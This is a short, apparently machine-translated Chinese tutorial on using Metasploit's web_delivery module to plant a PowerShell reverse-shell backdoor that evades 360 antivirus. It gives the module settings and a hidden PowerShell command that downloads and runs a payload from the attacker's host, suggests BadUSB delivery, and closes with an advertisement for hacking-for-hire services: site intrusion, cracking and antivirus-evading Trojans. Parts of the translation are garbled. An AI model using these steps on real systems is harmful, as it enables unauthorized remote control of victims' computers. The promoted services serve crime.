Metasploit后门免杀模块绕过360

1.第一步:使用msf脚本后门模块 使用exploit/multi/script/web_delivery 2.第2步:使用show opinion查看您需要使用的相关参数 显示选项  您可以看到以下参数:target,payload选项(包...

1.第一步:使用msf脚本后门模块
使用exploit/multi/script/web_delivery
2.第2步:使用show opinion查看您需要使用的相关参数
显示选项 

您可以看到以下参数:target,payload选项(包括ip和port),uripath等。


3.步骤3:检查目标中包含多少可选目标选项,使用以下参数查看
显示目标 

您可以看到以下选项:Python/PHP/powershell


4.步骤4:设置目标我们在这里选择2 - powershell的脚本
设置目标2 
5.步骤5:设置有效载荷选项,设置windows(powershell)弹跳shell链接
设置有效负载窗口/meterpreter/reverse_tcp
6.步骤6:设置攻击者 - 默认端口为:4444,您也可以更改它。我不会在这里设置它,直接使用默认端口
设置LHOST 192.168.1.101 
7.步骤7:设置uripath路径设置为根目录 - '/'
设置URIPATH/
8.步骤8:执行后门
利用/ 

9.步骤9:将代码复制到cmd——下运行的目标机器 - 使用想法使用“Badusb”和其他想法
Powershell.exe -nop -w hidden -c $ O=new-object net.webclient; $ O.proxy=[Net.WebRequest]: GetSystemWebProxy(); $ O.Proxy.Credentials [Net.CredentialCache]: DefaultCredentials ; IEX $ O.downloadstring('htt p192.168.1.101: 8080 /'); /度妈妈真的疯狂内网ip吞下
10.你可以看到反弹的外壳
Session -i //查看回调ID获取回调到meterpreter回调 

黑客业务列表介绍和一般分类: 类别:攻击入侵破解开发 1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量] 2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。 3:破解业务类:软件,加密文件,二次打包,脱壳等。 4:二次开发业务清单:软件二次开发,源代码二次开发等 5:其他业务订单:特洛伊木马[通过所有防病毒],远程控制,特殊软件等 备注:未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间,请在咨询前阅读:业务交易流程及相关说明 注意:仅接受正式业务,个人无权接受。收集此内容。